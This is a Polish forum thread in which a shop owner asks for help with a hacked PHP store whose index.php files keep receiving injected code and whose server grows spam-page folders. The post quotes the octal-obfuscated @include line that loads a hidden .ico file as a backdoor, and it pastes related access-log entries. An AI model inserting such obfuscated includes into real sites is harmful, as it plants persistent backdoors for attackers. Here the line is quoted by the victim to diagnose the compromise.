Dopisywanie kodu do plików php Opcje

[Dustin77]

Witam serdecznie,
Ostatnio mam problem na serwerze nazwa. Mamy postawiony sklep i pierwsze co się dzieje:
1. Tworzą się jakieś dziwne foldery na ftp typu: xjrsap, charmed-das,
2. Dopisywana jest komenda do plików index.php na serwerze nad znacznikiem header np.
""@include"\057hom\145/se\162ver\066872\0654/f\164p/m\151gra\143ja/\153mbc\056hom\145.pl\057pub\154ic_\150tml\057son\141rsk\154ep.\160l/t\143pdf\057inc\154ude\057bar\143ode\163/.2\062c2e\0612b.\151co""

3. Zmieniałem hasło do FTP ale nic to nie daje, podejrzewam że jest jakiś wirus który dopisuje skrypt, nie znam się na tyle na php.

Do tej pory edytowałem wszystkie pliki index.php i usunąłem dziwny kod, dzisiaj od nowa jest dopisany.

Łącze się tylko z jednego komputera z FTP, kaspersky skanuje mi codziennie kompa. Pomoc z hostingu rozkłada ręce. Po prostu mi ręce opadają.

Jakieś podpowiedzi?

[Dustin77]

Nie na wordpress. Dzisiaj rano znowu utworzone pliki index.php. Masakra jakaś po prostu już nie wiem, spróbuję zainstalować od nowa sklep. Musi być gdzieś plik który tworzy ten bałagan ale namierzyć go będzie ciężko.

Patrzyłem logi serwera i zawsze po restarcie około 1 w nocy mam takie coś:
172.56.42.234 - - [24/Apr/2021:23:09:25 +0200] "GET /javascript/jquery.js HTTP/2.0" 200 32330 "https://www.sonarsklep.pl/transferwise-reddit-jmdtx/01dbb9-craftsman-2800-psi-pressure-washer-spark-plug" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/87.0.4280.163 Mobile/15E148 Safari/604.1" sea1
172.56.42.234 - - [24/Apr/2021:23:09:25 +0200] "GET /szablony/shop_12.rwd/obrazki/szablon/rwd_rejestracja.png HTTP/2.0" 200 719 "https://www.sonarsklep.pl/transferwise-reddit-jmdtx/01dbb9-craftsman-2800-psi-pressure-washer-spark-plug" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/87.0.4280.163 Mobile/15E148 Safari/604.1" sea1
172.56.42.234 - - [24/Apr/2021:23:09:25 +0200] "GET /szablony/shop_12.rwd/obrazki/szablon/rwd_szukaj.png HTTP/2.0" 200 803 "https://www.sonarsklep.pl/transferwise-reddit-jmdtx/01dbb9-craftsman-2800-psi-pressure-washer-spark-plug" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/87.0.4280.163 Mobile/15E148 Safari/604.1" sea1
172.56.42.234 - - [24/Apr/2021:23:09:25 +0200] "GET /szablony/shop_12.rwd/obrazki/szablon/rwd_konto.png HTTP/2.0" 200 573 "https://www.sonarsklep.pl/transferwise-reddit-jmdtx/01dbb9-craftsman-2800-psi-pressure-washer-spark-plug" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/87.0.4280.163 Mobile/15E148 Safari/604.1" sea1
172.56.42.234 - - [24/Apr/2021:23:09:25 +0200] "GET /szablony/shop_12.rwd/obrazki/szablon/rwd_koszyk.png HTTP/2.0" 200 665 "https://www.sonarsklep.pl/transferwise-reddit-jmdtx/01dbb9-craftsman-2800-psi-pressure-washer-spark-plug" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/87.0.4280.163 Mobile/15E148 Safari/604.1" sea1

Ten folder oczywiście mam utworzony w katalogu głównym: transferwise-reddit-jmdtx jest tam plik index.php oraz folder cache...